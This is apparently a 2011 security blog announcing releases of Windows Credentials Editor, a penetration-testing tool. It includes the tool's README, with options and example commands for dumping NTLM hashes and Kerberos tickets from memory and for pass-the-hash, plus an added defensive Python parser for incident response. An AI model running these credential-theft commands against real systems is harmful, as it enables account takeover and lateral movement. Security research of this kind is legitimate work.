Tuesday, August 23, 2011

WCE v1.2 64-bit version released


You can find the 64-bit version of WCE v1.2 here

As always, all feedback is welcome, email me.


Thank you!

Wednesday, August 17, 2011

"Post-Exploitation with WCE" Presentation


This presentation describes the techniques WCE brings to penetration testers and how these can be used in different scenarios. Although originally targeted to college students studying information security, you might find useful information you didn't know about even if you are an experienced user of WCE or penetration tester.

Direct links:
Post-Exploitation with WCE (SPANISH)

Post-Exploitation with WCE (ENGLISH)

Wednesday, August 03, 2011

Windows Credentials Editor (WCE) FAQ released

I find myself answering a lot of questions about WCE and related matters all the time; for this reason I decided to create a WCE FAQ to try to provide a centralized source of information and answers to all the questions. 

You can find it here http://www.ampliasecurity.com/research/wcefaq.html

The FAQ is still a work in progress and I will continue to update it regularly with new information, attack scenarios, different ways to use the features provided by the tool, etc.

If you have a particular question that you want answered, please don't hesitate to contact me; I'll answer you personally and also add the question and answer to the FAQ.



Monday, April 18, 2011

Windows Credentials Editor (WCE) v1.2 released

Windows Credentials Editor v1.2

New features in this version:
-g              Generate LM & NT Hash.
                Parameters: <password>.
-K              Dump Kerberos tickets to file (unix & 'windows wce' format)
-k              Read Kerberos tickets from file and insert into Windows cache

Description:
Windows Credentials Editor (WCE) allows you to list logon sessions and add, change, list and delete associated credentials (e.g. LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, to obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, and to obtain Kerberos tickets and reuse them on other Windows or Unix systems.

WCE v1.2 supports obtaining logon sessions and NTLM credentials just by reading
memory without performing code injection.

Dumping Kerberos tickets and adding them to the Windows cache was tested on Windows 7; your feedback is welcome.


Download:
http://www.ampliasecurity.com/research/wce_v1_2.tgz

Wednesday, March 09, 2011

RootedCON 2011 "WCE Internals" presentation available at slideshare

Check out my presentation on "WCE Internals" (based on WCEv1.1) available at slideshare (posted by RootedCON):

http://www.slideshare.net/rootedcon/hernan-ochoa-wce-internals-rootedcon-2011

I'll publish the .pdf on http://www.ampliasecurity.com/research/ next week.

You can find all the RootedCON 2011 presentations here:


http://www.slideshare.net/rootedcon/

Some presos are in Spanish and some in English.

Go check them out!

Monday, March 07, 2011

WCE v1.1 is out!

WCE v1.1 is out!

http://www.ampliasecurity.com/research/wce_v1_1.tgz

README:


Windows Credentials Editor v1.1
(c) 2010, 2011 Amplia Security, Hernan Ochoa
written by: hernan@ampliasecurity.com
http://www.ampliasecurity.com
-------------------------------------------------------------

Abstract
----------
Windows Credentials Editor (WCE) allows you to list logon sessions and add, change, list and delete associated credentials (e.g. LM/NT hashes). This can be used, for example, to perform pass-the-hash on Windows and also to obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used in further attacks.

WCE v1.1 supports obtaining logon sessions and NTLM credentials just by reading
memory without performing code injection.

Supported Platforms
-------------------
Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008

Requirements
-------------
This tool requires administrator privileges.

Options
--------
Windows Credentials Editor provides the following options:

Options:  
    -l        List logon sessions and NTLM credentials (default).
    -s        Changes NTLM credentials of current logon session.
            Parameters: <username>:<domain>:<lmhash>:<nthash>.
    -r        Lists logon sessions and NTLM credentials indefinitely.
            Refreshes every 5 seconds if new sessions are found.
            Optional: -r.
    -c        Run in a new session with the specified NTLM credentials.
            Parameters: .
    -e        Lists logon sessions NTLM credentials indefinitely.
            Refreshes every time a logon event occurs.
    -o        saves all output to a file.
            Parameters: .
    -i        Specify LUID instead of use current logon session.
            Parameters: <luid>.
    -d        Delete NTLM credentials from logon session.
            Parameters: <luid>.
    -a        Use Addresses.
            Parameters:
    -f        Force 'safe mode'.
    -v        verbose output.

Examples:

    * List current logon sessions

C:\>wce -l
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

    * List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
        LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
        LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
        LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
        LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
        LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
        LUID:000003E4h
\:NTLM
        LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
        LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111   

    * Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

NTLM credentials successfully deleted!

    * Run WCE indefinitely, waiting for new credentials/logon sessions.
    Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

    * Run WCE indefinitely, waiting for new credentials/logon sessions
    Refresh is every 5 seconds by default.

C:\>wce -r

    * Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes every 5 seconds)

C:\>wce -r5
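
When a WCE listing (for example a file written with -o) is recovered during incident response, its credential lines show which accounts had hashes exposed in memory. The following parser is an added example, not part of WCE or its README; the function names and the sample text are constructed for illustration. It handles both the plain and the LUID-prefixed (-v) line formats shown above.

```python
import re

# Well-known constants: LM hash of an empty/disabled LM value, NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Optional 8-hex-digit LUID prefix (verbose mode), then user:domain:LM:NT.
CRED_LINE = re.compile(
    r"^(?:(?P<luid>[0-9A-Fa-f]{8}):)?"
    r"(?P<user>[^:\\]+):(?P<domain>[^:]*):"
    r"(?P<lm>[0-9A-Fa-f]{32}):(?P<nt>[0-9A-Fa-f]{32})\s*$"
)

def parse_wce_listing(text):
    """Return one dict per credential line; banner and session lines are skipped."""
    found = []
    for line in text.splitlines():
        m = CRED_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["lm"], rec["nt"] = rec["lm"].lower(), rec["nt"].lower()
        flags = []
        if rec["lm"] != EMPTY_LM:
            flags.append("lm-hash-present")   # a real LM hash was held in memory
        if rec["nt"] == EMPTY_NT:
            flags.append("blank-password")
        if rec["user"].endswith("$"):
            flags.append("machine-account")
        rec["flags"] = flags
        found.append(rec)
    return found

def accounts_to_reset(records):
    """Unique domain\\user pairs whose hashes appeared in the listing."""
    return sorted({f'{r["domain"]}\\{r["user"]}' for r in records})

# Constructed sample modelled on the README output above (not real credentials).
SAMPLE = """\
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security
Current Logon Session LUID: 00064081h
WIN-REK2HG6EBIS\\auser:NTLM
        LUID:0006409Fh
00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111
svc_backup:CORP:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
"""

if __name__ == "__main__":
    print(accounts_to_reset(parse_wce_listing(SAMPLE)))
```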


GETLSASRVADDR.EXE
-----------------
This tool automatically obtains the addresses WCE needs in order to read
logon sessions and NTLM credentials from memory.

Addresses obtained can then be used with WCE using the -A switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the
"Debugging Tools for Windows" package.